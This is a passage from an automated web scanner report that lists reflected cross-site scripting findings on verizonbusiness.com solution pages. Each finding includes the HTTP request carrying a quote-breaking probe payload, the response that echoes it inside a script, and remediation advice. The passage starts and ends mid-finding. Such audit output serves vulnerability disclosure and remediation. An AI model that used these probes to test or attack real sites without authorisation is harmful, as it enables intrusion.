This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/financeef9de"%3b0da596ec1ba/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:40 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41846
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:40 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/financeef9de";0da596ec1ba/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1011. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be18"%3b17aa8782901 was submitted in the REST URL parameter 1. This input was echoed as 5be18";17aa8782901 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions5be18"%3b17aa8782901/government/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:47 GMT
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions5be18";17aa8782901/government/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1012. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97413'%3bc8209a7285e was submitted in the REST URL parameter 1. This input was echoed as 97413';c8209a7285e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions97413'%3bc8209a7285e/government/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40640
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions97413';c8209a7285e/government/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1013. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc2ae"%3b9366212f6b1 was submitted in the REST URL parameter 2. This input was echoed as dc2ae";9366212f6b1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/governmentdc2ae"%3b9366212f6b1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/governmentdc2ae";9366212f6b1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1014. http://www.verizonbusiness.com/solutions/government/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/government/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 443e7'%3b0289e00b028 was submitted in the REST URL parameter 2. This input was echoed as 443e7';0289e00b028 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/government443e7'%3b0289e00b028/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/government443e7';0289e00b028/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1015. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4ba1'%3bd1c24f72747 was submitted in the REST URL parameter 1. This input was echoed as d4ba1';d1c24f72747 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsd4ba1'%3bd1c24f72747/healthcare/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutionsd4ba1';d1c24f72747/healthcare/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1016. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8f65"%3b7952c83781b was submitted in the REST URL parameter 1. This input was echoed as e8f65";7952c83781b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionse8f65"%3b7952c83781b/healthcare/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:55 GMT
Content-Type: text/html
Content-Length: 40642
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionse8f65";7952c83781b/healthcare/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1017. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 379d4"%3b7a8626b881d was submitted in the REST URL parameter 2. This input was echoed as 379d4";7a8626b881d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/healthcare379d4"%3b7a8626b881d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41854
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
tch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/healthcare379d4";7a8626b881d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1018. http://www.verizonbusiness.com/solutions/healthcare/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/healthcare/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c77e'%3b41f44f67ee5 was submitted in the REST URL parameter 2. This input was echoed as 7c77e';41f44f67ee5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/healthcare7c77e'%3b41f44f67ee5/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41852
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/healthcare7c77e';41f44f67ee5/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1019. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 955a4'%3b1d935a27c24 was submitted in the REST URL parameter 1. This input was echoed as 955a4';1d935a27c24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions955a4'%3b1d935a27c24/retail/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:35 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:35 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:35 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions955a4';1d935a27c24/retail/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1020. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0786"%3b6a38a284e2 was submitted in the REST URL parameter 1. This input was echoed as c0786";6a38a284e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsc0786"%3b6a38a284e2/retail/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40630
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsc0786";6a38a284e2/retail/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.1021. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d924f"%3b5e1acf6be88 was submitted in the REST URL parameter 2. This input was echoed as d924f";5e1acf6be88 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/retaild924f"%3b5e1acf6be88/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:37:54 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:54 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/retaild924f";5e1acf6be88/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1022. http://www.verizonbusiness.com/solutions/retail/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/retail/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac25'%3b317f5ab671 was submitted in the REST URL parameter 2. This input was echoed as 1ac25';317f5ab671 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/retail1ac25'%3b317f5ab671/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41842
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/retail1ac25';317f5ab671/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1023. http://www.verizonbusiness.com/solutions/utility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/utility/

Issue detail

